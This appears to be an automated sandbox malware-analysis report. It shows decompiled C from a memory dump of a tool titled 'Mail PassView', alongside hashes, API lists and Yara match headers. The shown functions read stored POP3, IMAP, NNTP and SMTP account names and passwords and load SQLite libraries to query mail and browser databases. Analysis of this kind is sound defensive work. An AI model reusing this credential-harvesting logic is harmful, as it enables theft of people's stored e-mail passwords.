                                                                        • Instruction ID: 7b61ab7fda62f62168f3ac6a9ee0746413b6f8a7e258cbbb94e4f4552fbd63bc
                                                                        • Opcode Fuzzy Hash: e32dadd6ea65d4380dfb3bd6d4dee2632db13c381429c7de7dc985ffcf152ca1
                                                                        • Instruction Fuzzy Hash: 49F139B08012589EDB21CF95D8487DEBFB0AF96308F5481EAD5593B241C7B94BC9CF98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 82%
                                                                        			E004106BE(void* __ecx, void* __edx) {
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				int _t58;
                                                                        				int _t59;
                                                                        				int _t60;
                                                                        				int _t61;
                                                                        				int _t63;
                                                                        				void* _t96;
                                                                        				void* _t99;
                                                                        				void* _t102;
                                                                        				void* _t105;
                                                                        				void* _t108;
                                                                        				void* _t111;
                                                                        				void* _t114;
                                                                        				void* _t117;
                                                                        				void* _t123;
                                                                        				void* _t194;
                                                                        				void* _t196;
                                                                        				void* _t201;
                                                                        				char* _t202;
                                                                        
                                                                        				_t194 = __edx;
                                                                        				_t201 = __ecx;
                                                                        				if(strcmp(__ecx + 0x46c, "Account_Name") == 0) {
                                                                        					_t204 = _t201 + 0x460;
                                                                        					E004060D0(0xff, _t201 + 0x870, E00406B74( *(_t201 + 0x460)));
                                                                        					_t123 = E00406B74( *_t204);
                                                                        					_t195 = _t201 + 0xf84;
                                                                        					E004060D0(0xff, _t201 + 0xf84, _t123);
                                                                        				}
                                                                        				_t202 = _t201 + 0x46c;
                                                                        				if(strcmp(_t202, "POP3_Server") == 0) {
                                                                        					_t117 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                                        					_t195 = _t201 + 0x970;
                                                                        					E004060D0(0xff, _t201 + 0x970, _t117);
                                                                        				}
                                                                        				if(strcmp(_t202, "IMAP_Server") == 0) {
                                                                        					_t114 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                                        					_t195 = _t201 + 0x970;
                                                                        					E004060D0(0xff, _t201 + 0x970, _t114);
                                                                        				}
                                                                        				if(strcmp(_t202, "NNTP_Server") == 0) {
                                                                        					_t111 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                                        					_t195 = _t201 + 0x970;
                                                                        					E004060D0(0xff, _t201 + 0x970, _t111);
                                                                        				}
                                                                        				if(strcmp(_t202, "SMTP_Server") == 0) {
                                                                        					_t108 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                                        					_t195 = _t201 + 0x1084;
                                                                        					E004060D0(0xff, _t201 + 0x1084, _t108);
                                                                        				}
                                                                        				if(strcmp(_t202, "POP3_User_Name") == 0) {
                                                                        					_t105 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                                        					_t195 = _t201 + 0xb70;
                                                                        					E004060D0(0xff, _t201 + 0xb70, _t105);
                                                                        					 *((intOrPtr*)(_t201 + 0xf70)) = 1;
                                                                        				}
                                                                        				if(strcmp(_t202, "IMAP_User_Name") == 0) {
                                                                        					_t102 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                                        					_t195 = _t201 + 0xb70;
                                                                        					E004060D0(0xff, _t201 + 0xb70, _t102);
                                                                        					 *((intOrPtr*)(_t201 + 0xf70)) = 2;
                                                                        				}
                                                                        				if(strcmp(_t202, "NNTP_User_Name") == 0) {
                                                                        					_t99 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                                        					_t195 = _t201 + 0xb70;
                                                                        					E004060D0(0xff, _t201 + 0xb70, _t99);
                                                                        					 *((intOrPtr*)(_t201 + 0xf70)) = 4;
                                                                        				}
                                                                        				if(strcmp(_t202, "SMTP_User_Name") == 0) {
                                                                        					_t96 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                                        					_t195 = _t201 + 0x1284;
                                                                        					E004060D0(0xff, _t201 + 0x1284, _t96);
                                                                        					 *((intOrPtr*)(_t201 + 0x1684)) = 3;
                                                                        				}
                                                                        				_t58 = strcmp(_t202, "POP3_Password2");
                                                                        				_t214 = _t58;
                                                                        				if(_t58 == 0) {
                                                                        					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t214, _t201, _t201 + 0x870);
                                                                        				}
                                                                        				_t59 = strcmp(_t202, "IMAP_Password2");
                                                                        				_t215 = _t59;
                                                                        				if(_t59 == 0) {
                                                                        					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t215, _t201, _t201 + 0x870);
                                                                        				}
                                                                        				_t60 = strcmp(_t202, "NNTP_Password2");
                                                                        				_t216 = _t60;
                                                                        				if(_t60 == 0) {
                                                                        					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t216, _t201, _t201 + 0x870);
                                                                        				}
                                                                        				_t61 = strcmp(_t202, "SMTP_Password2");
                                                                        				_t217 = _t61;
                                                                        				if(_t61 == 0) {
                                                                        					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t217, _t201, _t201 + 0xf84);
                                                                        				}
                                                                        				if(strcmp(_t202, "NNTP_Email_Address") == 0) {
                                                                        					E004060D0(0xff, _t201 + 0xe70, E00406B74( *((intOrPtr*)(_t201 + 0x460))));
                                                                        				}
                                                                        				_t63 = strcmp(_t202, "SMTP_Email_Address");
                                                                        				if(_t63 == 0) {
                                                                        					_t203 = _t201 + 0x460;
                                                                        					E004060D0(0xff, _t201 + 0xe70, E00406B74( *(_t201 + 0x460)));
                                                                        					_t63 = E004060D0(0xff, _t201 + 0x1584, E00406B74( *_t203));
                                                                        				}
                                                                        				_push("SMTP_Port");
                                                                        				_t196 = _t201 + 0x46c;
                                                                        				_push(_t196);
                                                                        				L004115DC();
                                                                        				if(_t63 == 0) {
                                                                        					_t63 = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
                                                                        					 *(_t201 + 0x168c) = _t63;
                                                                        				}
                                                                        				_push("NNTP_Port");
                                                                        				_push(_t196);
                                                                        				L004115DC();
                                                                        				if(_t63 == 0) {
                                                                        					L35:
                                                                        					_t63 = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
                                                                        					 *(_t201 + 0xf78) = _t63;
                                                                        				} else {
                                                                        					_push("IMAP_Port");
                                                                        					_push(_t196);
                                                                        					L004115DC();
                                                                        					if(_t63 == 0) {
                                                                        						goto L35;
                                                                        					} else {
                                                                        						_push("POP3_Port");
                                                                        						_push(_t196);
                                                                        						L004115DC();
                                                                        						if(_t63 == 0) {
                                                                        							goto L35;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				_push("SMTP_Secure_Connection");
                                                                        				_push(_t196);
                                                                        				L004115DC();
                                                                        				if(_t63 == 0) {
                                                                        					_t63 = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
                                                                        					 *(_t201 + 0x1690) = _t63;
                                                                        				}
                                                                        				_push("NNTP_Secure_Connection");
                                                                        				_push(_t196);
                                                                        				L004115DC();
                                                                        				if(_t63 == 0) {
                                                                        					L41:
                                                                        					 *((intOrPtr*)(_t201 + 0xf7c)) = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
                                                                        				} else {
                                                                        					_push("IMAP_Secure_Connection");
                                                                        					_push(_t196);
                                                                        					L004115DC();
                                                                        					if(_t63 == 0) {
                                                                        						goto L41;
                                                                        					} else {
                                                                        						_push("POP3_Secure_Connection");
                                                                        						_push(_t196);
                                                                        						L004115DC();
                                                                        						if(_t63 == 0) {
                                                                        							goto L41;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return 1;
                                                                        			}
























                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: strcmp$_stricmp$memcpystrlen
                                                                        • String ID: Account_Name$IMAP_Password2$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP_Email_Address$NNTP_Password2$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3_Password2$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP_Email_Address$SMTP_Password2$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                        • API String ID: 1113949926-2499304436
                                                                        • Opcode ID: 0c75f3a23bfcbdff00a9aa801863508d09b02361048c6915a7d59a784447564f
                                                                        • Instruction ID: 03d5d7842382467f3947e80262f6a1f2e973b0058f56c731c8fd5b97bb90a946
                                                                        • Opcode Fuzzy Hash: 0c75f3a23bfcbdff00a9aa801863508d09b02361048c6915a7d59a784447564f
                                                                        • Instruction Fuzzy Hash: D391517220870569E624B7329C02FD773E8AF9032DF21052FF55BE61D2EEADB981465C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040F64B(intOrPtr* __esi, char* _a4) {
                                                                        				void _v283;
                                                                        				char _v284;
                                                                        				void _v547;
                                                                        				char _v548;
                                                                        				struct HINSTANCE__* _t45;
                                                                        				struct HINSTANCE__* _t46;
                                                                        				struct HINSTANCE__* _t57;
                                                                        				struct HINSTANCE__* _t68;
                                                                        				CHAR* _t79;
                                                                        				intOrPtr* _t81;
                                                                        
                                                                        				_t81 = __esi;
                                                                        				if( *((intOrPtr*)(__esi + 0x24)) != 0) {
                                                                        					L14:
                                                                        					return 1;
                                                                        				}
                                                                        				_v284 = 0;
                                                                        				memset( &_v283, 0, 0x117);
                                                                        				if(_a4 == 0) {
                                                                        					E0040F435( &_v284);
                                                                        				} else {
                                                                        					strcpy( &_v284, _a4);
                                                                        				}
                                                                        				if(_v284 == 0) {
                                                                        					_t79 = "sqlite3.dll";
                                                                        					_t45 = GetModuleHandleA(_t79);
                                                                        					 *(_t81 + 0x24) = _t45;
                                                                        					if(_t45 != 0) {
                                                                        						goto L12;
                                                                        					}
                                                                        					_t57 = LoadLibraryA(_t79);
                                                                        					goto L11;
                                                                        				} else {
                                                                        					_v548 = 0;
                                                                        					memset( &_v547, 0, 0x104);
                                                                        					strcpy( &_v548,  &_v284);
                                                                        					strcat( &_v284, "\\sqlite3.dll");
                                                                        					if(E0040614B( &_v284) == 0) {
                                                                        						strcpy( &_v284,  &_v548);
                                                                        						strcat( &_v284, "\\mozsqlite3.dll");
                                                                        					}
                                                                        					_t68 = GetModuleHandleA( &_v284);
                                                                        					 *(_t81 + 0x24) = _t68;
                                                                        					if(_t68 != 0) {
                                                                        						L12:
                                                                        						_t46 =  *(_t81 + 0x24);
                                                                        						if(_t46 == 0) {
                                                                        							return 0;
                                                                        						}
                                                                        						 *_t81 = GetProcAddress(_t46, "sqlite3_open");
                                                                        						 *((intOrPtr*)(_t81 + 4)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_prepare");
                                                                        						 *((intOrPtr*)(_t81 + 8)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_step");
                                                                        						 *((intOrPtr*)(_t81 + 0xc)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_column_text");
                                                                        						 *((intOrPtr*)(_t81 + 0x10)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_column_int");
                                                                        						 *((intOrPtr*)(_t81 + 0x14)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_column_int64");
                                                                        						 *((intOrPtr*)(_t81 + 0x18)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_finalize");
                                                                        						 *((intOrPtr*)(_t81 + 0x1c)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_close");
                                                                        						 *((intOrPtr*)(_t81 + 0x20)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_exec");
                                                                        						goto L14;
                                                                        					} else {
                                                                        						_t57 = LoadLibraryExA( &_v284, 0, 8);
                                                                        						L11:
                                                                        						 *(_t81 + 0x24) = _t57;
                                                                        						goto L12;
                                                                        					}
                                                                        				}
                                                                        			}














                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040F674
                                                                        • strcpy.MSVCRT(?,?,?,?,00000000), ref: 0040F68B
                                                                        • memset.MSVCRT ref: 0040F6B8
                                                                        • strcpy.MSVCRT(?,?,?,00000000,00000104,?,?,00000000), ref: 0040F6CB
                                                                        • strcat.MSVCRT(?,\sqlite3.dll,?,?,?,00000000,00000104,?,?,00000000), ref: 0040F6DC
                                                                        • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F702
                                                                        • strcat.MSVCRT(?,\mozsqlite3.dll,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F713
                                                                        • GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F722
                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F739
                                                                        • GetModuleHandleA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040F747
                                                                        • LoadLibraryA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040F755
                                                                        • GetProcAddress.KERNEL32(?,sqlite3_open), ref: 0040F775
                                                                        • GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 0040F781
                                                                        • GetProcAddress.KERNEL32(?,sqlite3_step), ref: 0040F78E
                                                                        • GetProcAddress.KERNEL32(?,sqlite3_column_text), ref: 0040F79B
                                                                        • GetProcAddress.KERNEL32(?,sqlite3_column_int), ref: 0040F7A8
                                                                        • GetProcAddress.KERNEL32(?,sqlite3_column_int64), ref: 0040F7B5
                                                                        • GetProcAddress.KERNEL32(?,sqlite3_finalize), ref: 0040F7C2
                                                                        • GetProcAddress.KERNEL32(?,sqlite3_close), ref: 0040F7CF
                                                                        • GetProcAddress.KERNEL32(?,sqlite3_exec), ref: 0040F7DC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressProc$strcpy$HandleLibraryLoadModulememsetstrcat
                                                                        • String ID: \mozsqlite3.dll$\sqlite3.dll$sqlite3.dll$sqlite3_close$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_exec$sqlite3_finalize$sqlite3_open$sqlite3_prepare$sqlite3_step
                                                                        • API String ID: 3567885941-2042458128
                                                                        • Opcode ID: bd0ce2e375925359ec1219c205f3dbe1c8e580fb1eb91f69f3ac3bcbec633a35
                                                                        • Instruction ID: 8fd3bcd04759d815ffa5d5b817f34976dc276f641444eb2ebd63b60ef60fef8a
                                                                        • Opcode Fuzzy Hash: bd0ce2e375925359ec1219c205f3dbe1c8e580fb1eb91f69f3ac3bcbec633a35
                                                                        • Instruction Fuzzy Hash: C9416571940308AACB30AF718D85DCBBBF9AB58705F10497BE246E3550E778E685CF58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 98%
                                                                        			E0040E4A4(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, struct HDC__* _a16, long _a20, long _a24, intOrPtr _a28, signed int _a32, long _a36, intOrPtr _a40, struct tagPOINT _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, struct tagPOINT _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, char _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, long _a96, struct tagPOINT _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, struct tagSIZE _a116, struct tagRECT _a124, intOrPtr _a128, intOrPtr _a136, char _a336) {
                                                                        				signed int _v0;
                                                                        				intOrPtr _v4;
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v16;
                                                                        				intOrPtr _v20;
                                                                        				signed int _v28;
                                                                        				intOrPtr _v44;
                                                                        				struct HWND__* _v48;
                                                                        				struct HWND__* _v52;
                                                                        				intOrPtr _v60;
                                                                        				intOrPtr _v64;
                                                                        				intOrPtr _v68;
                                                                        				struct HDC__* _t169;
                                                                        				struct HWND__* _t171;
                                                                        				intOrPtr _t223;
                                                                        				void* _t224;
                                                                        				intOrPtr _t235;
                                                                        				struct HWND__* _t237;
                                                                        				void* _t240;
                                                                        				intOrPtr* _t274;
                                                                        				signed int _t275;
                                                                        				signed int _t276;
                                                                        
                                                                        				_t274 = __esi;
                                                                        				_t276 = _t275 & 0xfffffff8;
                                                                        				E004118A0(0x2198, __ecx);
                                                                        				_a12 =  *((intOrPtr*)( *((intOrPtr*)(__esi + 0x10)) + 0x1b4));
                                                                        				_t237 = GetDlgItem( *(__esi + 4), 0x3e9);
                                                                        				_a4 = GetDlgItem( *(__esi + 4), 0x3e8);
                                                                        				_a20 = GetWindowLongA(_t237, 0xfffffff0);
                                                                        				_a24 = GetWindowLongA(_a4, 0xfffffff0);
                                                                        				_a96 = GetWindowLongA(_t237, 0xffffffec);
                                                                        				_a36 = GetWindowLongA(_a4, 0xffffffec);
                                                                        				GetWindowRect(_t237,  &_a100);
                                                                        				GetWindowRect(_a4,  &_a60);
                                                                        				MapWindowPoints(0,  *(__esi + 4),  &_a100, 2);
                                                                        				MapWindowPoints(0,  *(__esi + 4),  &_a60, 2);
                                                                        				_t240 = _a108 - _a100.x;
                                                                        				_a4 = _a4 & 0x00000000;
                                                                        				_a28 = _a68 - _a60.x;
                                                                        				_a76 = _a112 - _a104;
                                                                        				_a40 = _a72 - _a64;
                                                                        				_t169 = GetDC( *(__esi + 4));
                                                                        				_a16 = _t169;
                                                                        				if(_t169 == 0) {
                                                                        					L9:
                                                                        					_v0 = _v0 & 0x00000000;
                                                                        					if( *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)) <= 0) {
                                                                        						L12:
                                                                        						_t171 = GetDlgItem( *(_t274 + 4), 1);
                                                                        						_a36 = _t171;
                                                                        						GetWindowRect(_t171,  &_a44);
                                                                        						MapWindowPoints(0,  *(_t274 + 4),  &_a44, 2);
                                                                        						GetClientRect( *(_t274 + 4),  &_a124);
                                                                        						GetWindowRect( *(_t274 + 4),  &_a80);
                                                                        						SetWindowPos( *(_t274 + 4), 0, 0, 0, _a88 - _a80 + 1, _a128 - _a136 - _a48 - _a84 + _a56 + _a92 + _a4 + 0x15, 0x206);
                                                                        						GetClientRect( *(_t274 + 4),  &_a80);
                                                                        						return SetWindowPos(_a36, 0, _a44.x, _a48 - _a56 - _a84 + _a92 - 5, _a52 - _a44 + 1, _a56 - _a48 + 1, 0x204);
                                                                        					}
                                                                        					_a20 = _a20 | 0x10000000;
                                                                        					_a24 = _a24 | 0x10000000;
                                                                        					_a8 = _a12 + 0x10;
                                                                        					do {
                                                                        						 *((intOrPtr*)( *_t274 + 0x1c))(_v0);
                                                                        						_v20 = E00401562(_t274, _a92, "STATIC", _a16, _a96, _v0 + _a100.x, _t240, _a72);
                                                                        						_v44 = E00401562(_t274, _a4, "EDIT", _v8, _a28, _v28 + _a32, _v4,  *(_t274 + 0x14) * _a8);
                                                                        						sprintf( &_a80, "%s:", _v52->i);
                                                                        						_t276 = _t276 + 0xc;
                                                                        						SetWindowTextA(_v48,  &_a80);
                                                                        						SetWindowTextA(_v52,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t274 + 0xc))))))(_v60,  &_a336));
                                                                        						_v60 = _v60 + 0x14;
                                                                        						_v64 = _v64 +  *(_t274 + 0x14) * _v28 +  *((intOrPtr*)(_t274 + 0x18));
                                                                        						_v68 = _v68 + 1;
                                                                        					} while (_v68 <  *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)));
                                                                        					goto L12;
                                                                        				}
                                                                        				_t223 = 0;
                                                                        				_a32 = _a32 & 0;
                                                                        				_a8 = 0;
                                                                        				if( *((intOrPtr*)( *((intOrPtr*)(__esi + 0x10)) + 0x1b0)) <= 0) {
                                                                        					L8:
                                                                        					_t224 = _t223 - _t240;
                                                                        					_a28 = _a28 - _t224;
                                                                        					_a60.x = _a60.x + _t224;
                                                                        					_t240 = _t240 + _t224;
                                                                        					ReleaseDC( *(_t274 + 4), _a16);
                                                                        					goto L9;
                                                                        				}
                                                                        				_v0 = _a12 + 0x10;
                                                                        				do {
                                                                        					if(GetTextExtentPoint32A(_a16,  *_v0, strlen( *_v0),  &_a116) != 0) {
                                                                        						_t235 = _a100.x + 0xa;
                                                                        						if(_t235 > _v8) {
                                                                        							_v8 = _t235;
                                                                        						}
                                                                        					}
                                                                        					_a16 =  &(_a16->i);
                                                                        					_v16 = _v16 + 0x14;
                                                                        				} while (_a16 <  *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)));
                                                                        				_t223 = _v8;
                                                                        				goto L8;
                                                                        			}


























                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                        • String ID: %s:$EDIT$STATIC
                                                                        • API String ID: 1703216249-3046471546
                                                                        • Opcode ID: 63f961038f13364f7976eadaedf26f00b3f2f6ee041d7cedeb7d286e156d3b6f
                                                                        • Instruction ID: 2f6da9a5868e125b8128a3bf626dfa5428397bb468519cd7ccc35e9b597c58da
                                                                        • Opcode Fuzzy Hash: 63f961038f13364f7976eadaedf26f00b3f2f6ee041d7cedeb7d286e156d3b6f
                                                                        • Instruction Fuzzy Hash: C9B1DE71108341AFD710DFA8C985A6BBBE9FF88704F008A2DF699D2260D775E814CF16
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 84%
                                                                        			E004010E5(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
                                                                        				struct tagPOINT _v12;
                                                                        				void* __esi;
                                                                        				void* _t47;
                                                                        				struct HBRUSH__* _t56;
                                                                        				void* _t61;
                                                                        				unsigned int _t62;
                                                                        				void* _t67;
                                                                        				struct HWND__* _t68;
                                                                        				struct HWND__* _t69;
                                                                        				void* _t72;
                                                                        				unsigned int _t73;
                                                                        				struct HWND__* _t75;
                                                                        				struct HWND__* _t76;
                                                                        				struct HWND__* _t77;
                                                                        				struct HWND__* _t78;
                                                                        				unsigned int _t83;
                                                                        				struct HWND__* _t85;
                                                                        				struct HWND__* _t87;
                                                                        				struct HWND__* _t88;
                                                                        				struct tagPOINT _t94;
                                                                        				struct tagPOINT _t96;
                                                                        				void* _t102;
                                                                        				void* _t113;
                                                                        
                                                                        				_t102 = __edx;
                                                                        				_push(__ecx);
                                                                        				_push(__ecx);
                                                                        				_t47 = _a4 - 0x110;
                                                                        				_t113 = __ecx;
                                                                        				if(_t47 == 0) {
                                                                        					__eflags =  *0x417348;
                                                                        					if(__eflags != 0) {
                                                                        						SetDlgItemTextA( *(__ecx + 4), 0x3ee, 0x417348);
                                                                        					} else {
                                                                        						ShowWindow(GetDlgItem( *(__ecx + 4), 0x3ed), 0);
                                                                        						ShowWindow(GetDlgItem( *(_t113 + 4), 0x3ee), 0);
                                                                        					}
                                                                        					SetWindowTextA( *(_t113 + 4), "Mail PassView");
                                                                        					SetDlgItemTextA( *(_t113 + 4), 0x3ea, _t113 + 0xc);
                                                                        					SetDlgItemTextA( *(_t113 + 4), 0x3ec, _t113 + 0x10b);
                                                                        					E00401085(_t113, __eflags);
                                                                        					E00406491(_t102,  *(_t113 + 4));
                                                                        					goto L29;
                                                                        				} else {
                                                                        					_t61 = _t47 - 1;
                                                                        					if(_t61 == 0) {
                                                                        						_t62 = _a8;
                                                                        						__eflags = _t62 - 1;
                                                                        						if(_t62 != 1) {
                                                                        							goto L29;
                                                                        						} else {
                                                                        							__eflags = _t62 >> 0x10;
                                                                        							if(_t62 >> 0x10 != 0) {
                                                                        								goto L29;
                                                                        							} else {
                                                                        								EndDialog( *(__ecx + 4), 1);
                                                                        								DeleteObject( *(_t113 + 0x20c));
                                                                        								goto L8;
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						_t67 = _t61 - 0x27;
                                                                        						if(_t67 == 0) {
                                                                        							_t68 = GetDlgItem( *(__ecx + 4), 0x3ec);
                                                                        							__eflags = _a12 - _t68;
                                                                        							if(_a12 != _t68) {
                                                                        								__eflags =  *0x417388;
                                                                        								if( *0x417388 == 0) {
                                                                        									goto L29;
                                                                        								} else {
                                                                        									_t69 = GetDlgItem( *(_t113 + 4), 0x3ee);
                                                                        									__eflags = _a12 - _t69;
                                                                        									if(_a12 != _t69) {
                                                                        										goto L29;
                                                                        									} else {
                                                                        										goto L18;
                                                                        									}
                                                                        								}
                                                                        							} else {
                                                                        								L18:
                                                                        								SetBkMode(_a8, 1);
                                                                        								SetTextColor(_a8, 0xc00000);
                                                                        								_t56 = GetSysColorBrush(0xf);
                                                                        							}
                                                                        						} else {
                                                                        							_t72 = _t67 - 0xc8;
                                                                        							if(_t72 == 0) {
                                                                        								_t73 = _a12;
                                                                        								_t94 = _t73 & 0x0000ffff;
                                                                        								_v12.x = _t94;
                                                                        								_v12.y = _t73 >> 0x10;
                                                                        								_t75 = GetDlgItem( *(__ecx + 4), 0x3ec);
                                                                        								_push(_v12.y);
                                                                        								_a8 = _t75;
                                                                        								_t76 = ChildWindowFromPoint( *(_t113 + 4), _t94);
                                                                        								__eflags = _t76 - _a8;
                                                                        								if(_t76 != _a8) {
                                                                        									__eflags =  *0x417388;
                                                                        									if( *0x417388 == 0) {
                                                                        										goto L29;
                                                                        									} else {
                                                                        										_t77 = GetDlgItem( *(_t113 + 4), 0x3ee);
                                                                        										_push(_v12.y);
                                                                        										_t78 = ChildWindowFromPoint( *(_t113 + 4), _v12.x);
                                                                        										__eflags = _t78 - _t77;
                                                                        										if(_t78 != _t77) {
                                                                        											goto L29;
                                                                        										} else {
                                                                        											goto L13;
                                                                        										}
                                                                        									}
                                                                        								} else {
                                                                        									L13:
                                                                        									SetCursor(LoadCursorA( *0x416b94, 0x67));
                                                                        									goto L8;
                                                                        								}
                                                                        							} else {
                                                                        								if(_t72 != 0) {
                                                                        									L29:
                                                                        									_t56 = 0;
                                                                        									__eflags = 0;
                                                                        								} else {
                                                                        									_t83 = _a12;
                                                                        									_t96 = _t83 & 0x0000ffff;
                                                                        									_v12.x = _t96;
                                                                        									_v12.y = _t83 >> 0x10;
                                                                        									_t85 = GetDlgItem( *(__ecx + 4), 0x3ec);
                                                                        									_push(_v12.y);
                                                                        									_a8 = _t85;
                                                                        									if(ChildWindowFromPoint( *(_t113 + 4), _t96) != _a8) {
                                                                        										__eflags =  *0x417388;
                                                                        										if( *0x417388 == 0) {
                                                                        											goto L29;
                                                                        										} else {
                                                                        											_t87 = GetDlgItem( *(_t113 + 4), 0x3ee);
                                                                        											_push(_v12.y);
                                                                        											_t88 = ChildWindowFromPoint( *(_t113 + 4), _v12);
                                                                        											__eflags = _t88 - _t87;
                                                                        											if(_t88 != _t87) {
                                                                        												goto L29;
                                                                        											} else {
                                                                        												_push(0x417388);
                                                                        												goto L7;
                                                                        											}
                                                                        										}
                                                                        									} else {
                                                                        										_push(_t113 + 0x10b);
                                                                        										L7:
                                                                        										_push( *(_t113 + 4));
                                                                        										E00406523();
                                                                        										L8:
                                                                        										_t56 = 1;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t56;
                                                                        			}


                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObject
                                                                        • String ID: Mail PassView
                                                                        • API String ID: 3628558512-272225179
                                                                        • Opcode ID: 8369354600cb7b80dd2c736e043661f8d54616cc87117d1ac6397b61caa72165
                                                                        • Instruction ID: a5e01e197ecdabf9e6bdb75eaf1794657044b10619e6b9182d208ef804a260cb
                                                                        • Opcode Fuzzy Hash: 8369354600cb7b80dd2c736e043661f8d54616cc87117d1ac6397b61caa72165
                                                                        • Instruction Fuzzy Hash: 68518130044248BFEB259F60DE85EAE7BB5EB04700F10853AFA56E65F0C7759D61EB08
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 73%
                                                                        			E0040CE28(void* __ecx, void* __eflags, intOrPtr _a4, char* _a8) {
                                                                        				char* _v8;
                                                                        				int _v12;
                                                                        				char* _v16;
                                                                        				char* _v20;
                                                                        				char* _v24;
                                                                        				int* _v28;
                                                                        				char* _v32;
                                                                        				int _v36;
                                                                        				intOrPtr _v44;
                                                                        				intOrPtr _v48;
                                                                        				intOrPtr _v64;
                                                                        				intOrPtr _v68;
                                                                        				char _v72;
                                                                        				char _v76;
                                                                        				void _v331;
                                                                        				int _v332;
                                                                        				void _v587;
                                                                        				int _v588;
                                                                        				void _v851;
                                                                        				char _v852;
                                                                        				void _v1378;
                                                                        				short _v1380;
                                                                        				void _v1995;
                                                                        				char _v1996;
                                                                        				void _v2611;
                                                                        				char _v2612;
                                                                        				char _v3636;
                                                                        				char _v4660;
                                                                        				char _v5684;
